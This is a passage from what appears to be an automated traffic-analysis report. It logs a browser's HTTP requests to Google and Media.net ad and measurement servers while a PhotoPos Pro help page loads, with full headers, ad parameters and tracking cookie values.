IENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm
                  Source: global trafficHTTP traffic detected: GET /pagead/drt/si?st=NO_DATA HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/pagead/drt/si?st=NO_DATAAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DSID=NO_DATA; IDE=AHWqTUlYKLd2nrLBhUcvh-IUqKEHhw_GypatkCoVS-brI49n0BtVL153Rojk2aZ8
                  Source: global trafficHTTP traffic detected: GET /pagead/html/r20250218/r20190131/zrt_lookup_fy2021.html HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DSID=NO_DATA; IDE=AHWqTUnYYsTtpBOSvLqWvPqCmD2TjwuYFVxQ9rMNfd3ThpsosdgMuByyaTWst2l072A; APC=AfxxVi5wS4b21ZACNqwSway73Kcygc5hLtl3N-CwIDxRaOWEhfl9-g
                  Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-1428940366894897&output=html&adk=1812271804&adf=3025194257&abgtt=9&lmt=1740326333&plaf=1%3A2%2C7%3A2&plat=1%3A128%2C2%3A128%2C3%3A128%2C4%3A128%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1048576%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&pra=5&wgl=1&aihb=0&asro=0&ailel=1~2~4~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~3~4~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33~38&aifxl=29_18~30_19&aiixl=29_5~30_6&aiapm=0.15&aiapmi=0.33938&aiescf=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326333281&bpp=14&bdt=76&idt=241&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D4688b6cfea46fcf5%3AT%3D1740326326%3ART%3D1740326326%3AS%3DALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A&gpic=UID%3D000010400d671c69%3AT%3D1740326326%3ART%3D1740326326%3AS%3DALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw&eo_id_str=ID%3Da73a950e8b687589%3AT%3D1740326326%3ART%3D1740326326%3AS%3DAA-AfjYWjoKZSzCfr3rfuQpOlQZP&nras=1&correlator=5872031566226&frm=20&pv=2&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1034&bih=870&scr_x=0&scr_y=0&eid=95347433%2C95350015&oid=2&pvsid=1079719830296918&tmod=571211461&uas=0&nvt=2&fsapi=1&ref=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=264 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DSID=NO_DATA; IDE=AHWqTUnYYsTtpBOSvLqWvPqCmD2TjwuYFVxQ9rMNfd3ThpsosdgMuByyaTWst2l072A; APC=AfxxVi5wS4b21ZACNqwSway73Kcygc5hLtl3N-CwIDxRaOWEhfl9-g
                  Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-1428940366894897&output=html&h=90&slotname=3041733634&adk=1285989196&adf=412585417&pi=t.ma~as.3041733634&w=728&abgtt=9&lmt=1740326333&format=728x90&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326333578&bpp=2&bdt=374&idt=2&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D4688b6cfea46fcf5%3AT%3D1740326326%3ART%3D1740326326%3AS%3DALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A&gpic=UID%3D000010400d671c69%3AT%3D1740326326%3ART%3D1740326326%3AS%3DALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw&eo_id_str=ID%3Da73a950e8b687589%3AT%3D1740326326%3ART%3D1740326326%3AS%3DAA-AfjYWjoKZSzCfr3rfuQpOlQZP&prev_fmts=0x0&nras=1&correlator=5872031566226&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=271&ady=10&biw=1034&bih=870&scr_x=0&scr_y=0&eid=95347433%2C95350015&oid=2&pvsid=1079719830296918&tmod=571211461&uas=0&nvt=2&ref=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=0&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=17 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DSID=NO_DATA; IDE=AHWqTUnYYsTtpBOSvLqWvPqCmD2TjwuYFVxQ9rMNfd3ThpsosdgMuByyaTWst2l072A; APC=AfxxVi5wS4b21ZACNqwSway73Kcygc5hLtl3N-CwIDxRaOWEhfl9-g
                  Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-1428940366894897&output=html&h=164&slotname=1037575739&adk=145184860&adf=840300260&pi=t.ma~as.1037575739&w=654&abgtt=8&fwrn=4&lmt=1740326333&rafmt=11&format=654x164&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326333629&bpp=12&bdt=424&idt=12&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D4688b6cfea46fcf5%3AT%3D1740326326%3ART%3D1740326326%3AS%3DALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A&gpic=UID%3D000010400d671c69%3AT%3D1740326326%3ART%3D1740326326%3AS%3DALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw&eo_id_str=ID%3Da73a950e8b687589%3AT%3D1740326326%3ART%3D1740326326%3AS%3DAA-AfjYWjoKZSzCfr3rfuQpOlQZP&prev_fmts=0x0%2C728x90&nras=1&correlator=5872031566226&frm=20&pv=1&rplot=4&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=353&ady=2655&biw=1017&bih=870&scr_x=0&scr_y=0&eid=95347433%2C95350015&oid=2&pvsid=1079719830296918&tmod=571211461&uas=0&nvt=2&ref=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CEebr%7C&abl=CS&pfx=0&fu=128&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&btvi=1&fsb=1&dtd=19 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DSID=NO_DATA; IDE=AHWqTUnYYsTtpBOSvLqWvPqCmD2TjwuYFVxQ9rMNfd3ThpsosdgMuByyaTWst2l072A; APC=AfxxVi5wS4b21ZACNqwSway73Kcygc5hLtl3N-CwIDxRaOWEhfl9-g
                  Source: global trafficHTTP traffic detected: GET /i/ca-pub-1428940366894897?href=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&ers=2 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /pagead/adview?ai=CwrIWv0W7Z9v_HMqRiM0P6_vriQ2_oem6faeVjLjCE_eN_vISEAEgpIbpA2DJBqAB0MC1_T3IAQGoAwHIA8sEqgSfAk_QKkwbeoQWK_Z2wCegOY7u1NW74IfG7MnJX-0VaWCg-sjxmn-gTqKiV8XO3P3k9nqnRdk3dI_oXHGSu3ZWI92pipSd-wow5ULjcxOhpCUf8obVREnF3cdJn2GNqeW6Y_fMKKBaF3LNyrHB33WR-GQbcfpfST5hAAmJwco44D-4az4IwFRNSFpG51MNF0pr0vgu2poui18PpZoWwxhPNj0BUMOpdjRA0_rWDkuts_SCzDg4drZNF_pqKayfPLOXMq3PkSjaqnIH3mUAcEWW2m_s7waeVTWNVpFxrgC3p4dkiveYxRvXHEwWGOna7znAZsQ3gMZwF-G7cBFxmfM1x8O6vuWHPTaX3VxL2eI_Oi6IXBORFZMN5RQgu2-RF57wwAThuInckwWIBdu5i9dSkgUECAQYAZIFBAgFGASAB9D4hd0YqAfVyRuoB9m2sQKoB6a-G6gHjs4bqAeT2BuoB_DgG6gH7paxAqgH_p6xAqgHr76xAqgH98KxAtgHAfIHBBDPu0bSCCkIgOGAYBABGJ8BMgLLAjoLgECAwICAgKCogAJIvf3BOljPwJLolNqLA5oJKGh0dHBzOi8vd2ViZnJlZXBkZi5jb20vbHAyLz9nYWRfc291cmNlPTWACgHICwHaDBAKChCAgvT1_PHdj0cSAgED6g0TCPOP0eiU2osDFcoIogMd6_060dgTDIgUAtAVAYAXAbIXHgoaCAASFHB1Yi0xNDI4OTQwMzY2ODk0ODk3GAAYAboXAjgBshgJEgKxXxgBIgEA0BgB&sigh=hHA7cSMpiJ8&uach_m=%5BUACH%5D&ase=2&cid=CAQSOwCjtLzMtZWInL5oI4UU0iIXgYl8h0Csg5awz0mpj1K4UKzsAKRRM1Q8tes6GGWBf-_5MlUnu2yF4JrNGAE&template_id=5001&vis=1&ebtr=1&nis=6 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAttribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceReferer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1428940366894897&output=html&h=90&slotname=3041733634&adk=1285989196&adf=412585417&pi=t.ma~as.3041733634&w=728&abgtt=9&lmt=1740326333&format=728x90&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326333578&bpp=2&bdt=374&idt=2&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D4688b6cfea46fcf5%3AT%3D1740326326%3ART%3D1740326326%3AS%3DALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A&gpic=UID%3D000010400d671c69%3AT%3D1740326326%3ART%3D1740326326%3AS%3DALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw&eo_id_str=ID%3Da73a950e8b687589%3AT%3D1740326326%3ART%3D1740326326%3AS%3DAA-AfjYWjoKZSzCfr3rfuQpOlQZP&prev_fmts=0x0&nras=1&correlator=5872031566226&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=271&ady=10&biw=1034&bih=870&scr_x=0&scr_y=0&eid=95347433%2C95350015&oid=2&pvsid=1079719830296918&tmod=571211461&uas=0&nvt=2&ref=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&fc=1920&brdim=10%2C10%
                  Source: global trafficHTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaRnICZdLMNmcdwiv3lrLn4d0ry1E2mikmFB0uQFfF8qmutERIFTtiNA9wx8M0qG548IXCeW HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /f/AGSKWxVLMaZcHkKoLu5thRn4l6f5NGz8ZvS8dlZZTruzGNCtDvd6SP2kcXa1jMPp5OPrlyZZ95XHw6fyEUY6C2tpAe4e3OUmIMKFsQsj243hXD8LVIOnEIanjLQrpveTDbMDB84kYCCyfQ==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzQwMzI2MzM2LDI5ODAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly93d3cucGhvdG9wb3MuY29tL1Bob3RvUG9zUHJvX0ZyZWVQaG90b0VkaXRvcl92My9IZWxwJTIwUGFnZXMvUFBQM19IZWxwX1dlbGNvbWUuYXNweCIsbnVsbCxbWzgsInNmdFdZX2U0ZHBvIl0sWzksImVuLVVTIl0sWzIzLCIxNzQwMzI2MzI2Il0sWzE5LCIyIl0sWzE3LCJbMF0iXSxbMjQsInd3dy5waG90b3Bvcy5jb20iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /bping.php?ugd=4&lper=100&ssld=%7B%22QQNN%22%3A%22%22%2C%22QQN75%22%3A%22%22%2C%22QQ8E%22%3A%22%22%2C%22QQQN%22%3A%22%22%7D&vi=1740326335587556820&vgde_ydsp=%7B%221Ok%22%3A%22u%22%2C%225ON%22%3A%22J1Q7MQN%22%2C%227JQ7VO4z7875%22%3A%22uFH%22%2C%22GxNUJ7I1YJ4z7875%22%3A%22pJ1eJLnRxNUJ7%22%2C%22GxNUJ7VO4z7875%22%3A%22XfW%22%2C%22N11%22%3A%22XFWF~9%22%2C%22QEx%22%3A%22XuWX~9%22%7D&vgd_rpth=%2Fola&vgd_cdv=O1453&vgd_bid=337997&vgd_ydspr=1&vgd_cage=3&vgd_wlstp=0&vgde_bdata=QOfvzxjj~8xLjMjvu9~e8fXv9~myJLEYvf.fH~OmYMGv9.hF~QNOvIK~L1Jv9%2C9%2Cou~OmYMjvf9~ejfLMQOvf9fX9ffA9h~8xLjMGvu9Fh.uH~xLjM7UNv9~xLjMLf1MGv9~Q7Ov1QB8k7MiMwmQ7~N7-ejfLMQOvXXh~8Evou~kGGv9~LEQMQOvf9fX9ffAuu~L1Oev9.999%2C9~xLjMGv9.iH~ejfLMxLjMGv9~xLjMjvu9~Qjevuuh.Wh~yN17vou~GGvuiF~JLEYvu.uf~ejfLMxLjMUNv949~EQ8MNviAW%2Cu%2C9%2C9%2C9%2C9%2Cuu%2C9~EQ8MOviAXhu~GYv9.X~LUJv9%2C9%2Cou~1AEMGvAf.AW%2CuAH.HX~QOv9~LMBLMGvAA9.uW%2C9~x8OvfV1ZdGrDyfxwp%2FkqUO~NejfLMGvh.Fi~G7OvffuWAhfFihXWiXFi9hXWuiHAAufh9iFfuuFHAAXhFHHfuhXAufuXXfuuWhAHXh9fFfHXuh9fFHiWFA9XW99fF9ifiW9XufFiAuAihFhhFAhufAuHHhXfF9uXAXAfiuW9HFhf~x8Yv9~LM7QvW%3DPXD6u0%2F~1EEMzvzmzM1EE~eLMxLjMGvXAH.9h~myOfEMGv9.ih~GxyOvH~QQvIK~NNvPb~JLYvou~x8Bvou~NJv9~LNevHH.HW~%3DVvAAfH~UGMxNv9~JLev9~z7Qvuf~N7vIK~1yyMQ7mLJMQOv~G1Q8QfvuiF~GO7vuhH9AfFAAX~G1Q8QuvuiF~UGM77v9~ONvW~ejfLMGvAf.AW~77vHuf~xjYMEv9.uF~JQ7v9~eBMJ-Nv9.iX~OBYMejfLMGvH9.hi~e8QMQOvXF9~xLjMLEQMGvuu.AX~ONfvu~JNQv9~eM1Qzv9~GMkjLv9.9u~j1Q7v%24%7Bj1Q7Mkj1y%7D~Nemyvh.Fi~e8QMxLjMGv9.XA~ejfLM8MQOvf9fX9ffA9h~e8QMxLjMjv9~UNfXv9~J7vfA~ejfLM8MGv9.9A~LJkMLvI~e8QMGvXuH.Hu~ejfLMxLjMe8vu4ouF~xLjM7e8v9~1yyMQ7mLJMGvu~eev9~NejfLMQOvXXi~LkevHH.HW~jfLMGvu999~L1OEv9.999%2C9~Q8OvfX9XAhAhu~N7-ejfLMGvou999~xLjMLEQMUNv9~UGMQLNv1x7mMG8OOJL~eBxv9.iX~OfEMjvu9~Nejfvh.Fi~AENkvu999~OYYMQ7LyvE8zz1NjJ~OfEMGv9.iW~LEQMGvuAH.HX~xLjMQLEQMGvuu.AX~LUBEv9.999%2C9~z75EJvf~c0fv.%2AEwm7m.%2A~J-EQNmLJvou~LUBOv9.999%2C9~8QDJkv%24%7BLJkLJQwMNmxz7JL%7D~8Q8kv9~OBYMejfLMQOv~xLjMLENMGv9~G8Ovu.uf~xLjMLEQMLev9~%24%7B%3Dj8Jz73Tmy%7D~8GNvu~zQlvuf~7yQvuF9-F99%7Cf99-f99%7CfH9-H99%7CfX9-fX9%7CA99-fX9%7CA99-F99%7CAf9-HW9%7CAAF-fW9%7CHW9-Af9%7CXW9-H99%7ChAF-HuH%7ChX9-f99~7Y-vA9u~Y-GU7v9~Y-wYQvHW~Y-wYJv9~kExLJ+vu&vgd_setup=c22&vgd_hb_audit_1=8CU1SGZ43&vgd_hb_audit_2=337691538&cc=US&crid=250537371&mspa=0&ybn_cc_exp=0&vgd_oreqf=one&vgd_oresf=one&prid=8PRVCXX19&wsip=170775074&gdpr=0&r=1740326335690&vgd_l2type=ola&lf=6&requrl=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wshp=0&vgd_tsce=L784&cid=8CU5RJ1PV&vgd_len=2534&vgd_end=1 HTTP/1.1Host: lg3.media.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://go
                  Source: global trafficHTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaTVTLmB6q7RieeDoWg10LjsR7-tkgurPz00EasFBYHeQNnhA7hTZQEHTHU1klfeO5BvmzGb HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /sr/2722522032/SAFEFRAME.html?ule=4331&-FWttt=ll%3D%21x.%7C1P%3D%21%7ClW94%3DC-%2ChC%7CWD1%3D%21&0DJFwj=E&0h-=%29&144JD=%21&4DWF=va5%29&4Jc-=2%28%21%2A.%2A.&9-4%21=583%216mz%29Z&9-4.=ZZa_%2A%217Z5&9-Ct9cw=&9-Q=&9J80=&9W4=sHY009%29ZKHhw~Z9b%290j~y~P%2FbwjHy09b~yF&B-=&B949=94Cw&B94JPF=%21&B94c-=%2AEEE%21%21a%29%2A&B94lc-=f.%21&B9D4D=9l4l%3DE%7C%7C9l4K%3DE%7C%7Cl4-%3D.5.%7C%7C4D4VJF%3Df%21E%29E5%7C%7C4l4VJF%3DQaE%29v.brJ%7C%7C4JW%3D_%7C%7C4W%3D.&B9JW=%2AZ&B9XCh=8Y%3D%217EE%7C%7C2vYR%3D.E%7C%7C6YR%3D5%7C%7C6Y%3D%29%21Za%7C%7CH2%3D62bHvr%7C%7C2s2R%3Da%29%2AZ%2A5%2A5%21%29ZE%29.%297.%295%7C%7CSY%3D%29.Z.%7C%7CAYR%3DE%7C%7C228%3D_%7C%7CSs2R%3DZ5%29%7C%7C33YR%3D.Y9B2mFHUJqRd8A1mn&B9XD=4lc-%3Df.%21%7C%7CXtc-%3DQaE%29v.brJ%7C%7C44VJF%3D%21EE%21%2A%7C%7CJ4%3D%21%7C%7CW4P%3DEkE_%21%7C%7CPJW%3DEkZ%21%7C%7CUPJW%3D%21%7C%7C44-%3D%21&BUPj=&